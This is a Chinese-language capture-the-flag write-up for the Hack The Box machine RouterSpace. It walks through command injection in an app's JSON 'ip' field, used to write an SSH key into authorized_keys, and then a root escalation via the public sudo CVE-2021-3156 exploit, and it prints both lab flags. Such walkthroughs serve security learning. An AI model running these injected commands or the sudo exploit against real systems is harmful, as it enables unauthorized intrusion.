Hackthebox - RouterSpace
靶场信息
靶场类型
信息搜集
Nmap
┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.148
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 21:16 EST
Nmap scan report for 10.10.11.148
Host is up (0.28s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-76343
| Content-Type: text/html; charset=utf-8
| Content-Length: 78
| ETag: W/"4e-iLIX7S/AlC0nyhqE0lYp8aZLlm4"
| Date: Mon, 28 Feb 2022 02:17:00 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: j7Q X53 Qp3 9o 7 B2JL }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-10824
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Mon, 28 Feb 2022 02:16:56 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-97983
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Mon, 28 Feb 2022 02:16:57 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.91%I=7%D=2/27%Time=621C309D%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.91%I=7%D=2/27%Time=621C309D%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,13E4,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-10824\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Mon,\x2028\x20Feb\x202022\x2002:16:56\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-97983\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Mon,\x2028\x20Feb\x202022\x2002:16
SF::57\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,134,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-76343\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2078\r\nETag:\x20W
SF:/\"4e-iLIX7S/AlC0nyhqE0lYp8aZLlm4\"\r\nDate:\x20Mon,\x2028\x20Feb\x2020
SF:22\x2002:17:00\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x20j7Q\x20\x20X53\x20Qp3\x20\x20
SF:9o\x207\x20\x20\x20B2JL\x20\x20}\n\n\n\n\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.18 seconds
Http
先去看看80端口
这似乎是一个公寓的路由管理系统
先到处看看
这里右上角Download会下载一个apk包,下载下来后使用模拟器运行然后burp抓包看看
Apk
在Debian架构的Linux中安装AnBox模拟器的方法
anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
安装后以后咱们启动模拟器
adb shell settings put global http_proxy 192.168.31.208:8080
然后burp设置好监听端口以后,使用burp对anbox进行代理
adb install RouterSpace.apk
安装app,然后打开
APK文件运行后就只有一个查看状态的按钮,我们抓包看看
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate
{"ip":"0.0.0.0"}
将routerspace.htb加入到hosts
echo 10.10.11.148 routerspace.htb >> /etc/hosts
抓包下来后是这么个状态,去放包看看
这边我有个大胆的想法,看着跟DVWA的命令注入很类似,去测试一下是否可行
成功被执行了,那就好玩了,去构造POC拿shell吧
漏洞利用
尝试写入文件,但是无法执行成功
试试能不能执行命令
调用bash也失败了
然后在/home/paul/.ssh/里也没有东西,但是经过测试后,.ssh里可以写入文件
这里突然就有个思路了,生成一个sshkey,然后写入进去就可以ssh登陆了
ssh-keygen
然后全部默认即可生成
然后把id_rsa.pub的内容保存为authorized_keys
{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMxVRUf56TSx5tkTab+gCMuO3EFgbMTbNlLOhqEvLiDLcST6zbYl0ofc4cGNguoi6ti6iyi8ZHyS8DjJ89thmpTrDiYXf39Z8QhkO2DaQkzh6FjvvGgY82pVBPtRq1qL0JrnOgqhGBigs3kPbd0kkdmOmDbmV1w1p9omfk2Tj/+q469S+1IVCtQIIvtNuuGTUeTMYQdCfFLOB4OVHBLvAuucIagK2DJrJLgcf0w/DQ/9X04luqhqQET8SfQqBpfn1nq/CcJvXsMlCGqbjE4m6c5l4WIaeAtfrhUdrVukSg0x/r1OJvEm4MgevR7eN/umwGP6yQVH34eBoTHoU6P+H3+9csDAMujbSCWJi3yGK9U5Q7Rei0DsiCrd6T0qbQuCmu4bUdJZfSZCGPCSxO7LRCQlNI13RLRTTUPh6cQn7eB+bnucs/YRgx2/O4b+EDsWGEveXQTpfbJxYLMeespC95v5Rj/vl1C3zqq2nIUIqXC13Y+966+92x4Y6vVmaKDC0= root@kali' > /home/paul/.ssh/authorized_keys"}
然后给700权限
{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}
然后使用ssh进行登陆
┌──(root💀kali)-[~/Desktop]
└─# ssh paul@10.10.11.148 -i id_rsa
The authenticity of host '10.10.11.148 (10.10.11.148)' can't be established.
ECDSA key fingerprint is SHA256:M4jDfH65U/Fw7jjmKhTZcb9LgW/gi23OjcLjM1bA5UY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.148' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 03 Mar 2022 11:30:25 AM UTC
System load: 0.07
Usage of /: 71.7% of 3.49GB
Memory usage: 31%
Swap usage: 0%
Processes: 214
Users logged in: 0
IPv4 address for eth0: 10.10.11.148
IPv6 address for eth0: dead:beef::250:56ff:feb9:888d
80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Mar 2 22:54:39 2022 from 10.10.14.27
paul@routerspace:~$ whoami&&id
paul
uid=1001(paul) gid=1001(paul) groups=1001(paul)
成功拿到user权限
paul@routerspace:~$ ls
snap user.txt
paul@routerspace:~$ cat user.txt
a874812f3d7207b3f4ad32da4bc2bc84
成功拿到user权限的flag文件
权限提升
首先去跑一个linpeas.sh脚本看看有没有提权点
https://github.com/LucifielHack/linpeas.sh/blob/main/linpeas.sh
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
跑完以后我看到了这么个东西,然后去搜索一下sudo 1.8.31的漏洞
这里看到了一个漏洞CVE-2021-3156
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
paul@routerspace:~/Sudo-1.8.31-Root-Exploit$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
paul@routerspace:~/Sudo-1.8.31-Root-Exploit$ ./exploit
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),1001(paul)
成功拿到root权限的flag文件
# cat /root/root.txt
f3388fc86d949870742895a2c1d6f16e
成功拿到root权限的flag文件